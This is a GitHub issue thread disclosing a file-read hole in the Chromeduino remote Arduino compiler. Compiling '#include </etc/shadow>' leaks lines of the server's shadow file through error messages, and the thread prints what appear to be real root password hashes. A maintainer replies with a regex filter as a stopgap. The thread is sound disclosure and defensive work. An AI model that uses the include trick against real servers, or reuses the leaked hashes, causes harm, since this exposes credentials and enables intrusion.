### ISSUE TITLE
Security Issue: Can read parts of files from server

### ISSUE THREAD

**Issue by AllanTaylor314** [spaceneedle/Chromeduino#10]
Compiling the code `#include </etc/shadow>` gives the output 

> Uploading to remote compiling server: http://chromeduino.3mr.fr
> In file included from /tmp/chromeduino-28764QE2PlLvSh07c/chromeduino-28764QE2PlLvSh07c.ino:1:0:
> /etc/shadow:1:1: error: stray '$' in program
> root:$6$R4mTc7sq$4Ti6Yjf/CRHkQAtV0b0CZ7OlRCbLrU0tM/h62KtCKyj.suJi2zakbrsk4HsZlWbhmndXoQMiO5eVFT1QV0d/80:17009:0:14600:14:::
> ^
> /etc/shadow:1:1: error: stray '$' in program
> /etc/shadow:1:1: error: stray '$' in program
> /etc/shadow:22:1: error: stray '$' in program
> mc:$6$10193419$hoQpUF3/k66569lefCVbtCEOMUEfOU2DjdTQFisP6y4FxGD4e.ljNAyhr5fpYn0EB1hhPphL/5Mr.tToD2Pg8.:16321::::::
> ^
> /etc/shadow:22:1: error: stray '$' in program
> /etc/shadow:22:1: error: stray '$' in program
> /etc/shadow:1:1: error: 'root' does not name a type
> root:$6$R4mTc7sq$4Ti6Yjf/CRHkQAtV0b0CZ7OlRCbLrU0tM/h62KtCKyj.suJi2zakbrsk4HsZlWbhmndXoQMiO5eVFT1QV0d/80:17009:0:14600:14:::
> ^
> exit status 1

This leaks a lot of information. It could work for any file that node.js (or the Arduino process it spawns) can read (.htpasswd, /etc/shadow, /etc/groups, if run as root or with wrong permissions) as long as the attacker knows the full name and path. Sensitive files are often located at the same location on all systems. A fix to limit Arduino's ability to read files outside of its directory would be recommended. It does not leak the full contents of the file but still leaks enough information to be bad.

**Comment by mrfrase3** [comment]
hmm. good catch.

for now, a `if(/#\s*include\s*<\.*\/.*>/.test(code)) throw new Error('Security out-of-bounds')` should fix that issue, but securing the compiling does need a rethink
